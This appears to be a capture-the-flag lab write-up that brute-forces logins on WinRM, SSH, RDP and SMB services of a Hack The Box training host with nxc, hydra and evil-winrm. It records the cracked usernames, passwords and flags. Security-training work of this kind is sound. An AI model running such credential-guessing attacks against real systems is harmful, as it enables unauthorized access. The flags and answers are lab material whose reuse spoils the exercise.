Find the user for the WinRM service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.
nxc winrm 10.129.202.136 -u username.list -p password.list
Then get flag with evil-winrm
HTB{That5Novemb3r}
Find the user for the SSH service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.
hydra -L username.list -P password.list ssh://10.129.202.136
[22][ssh] host: 10.129.202.136 login: dennis password: rockstar
Find the user for the RDP service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.
nxc rdp $HOST -u chris -p password.list
RDP 10.129.202.136 3389 WINSRV [+] WINSRV\\chris:789456123 (Pwn3d!)
Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.
nxc smb $HOST -u username.list -p password.list --shares
Allows to list shares, a share is named CASSIE, username is probably cassie
nxc smb $HOST -u cassie -p password.list --shares
SMB 10.129.202.136 445 WINSRV [+] WINSRV\\cassie:12345678910
HTB{S4ndM4ndB33}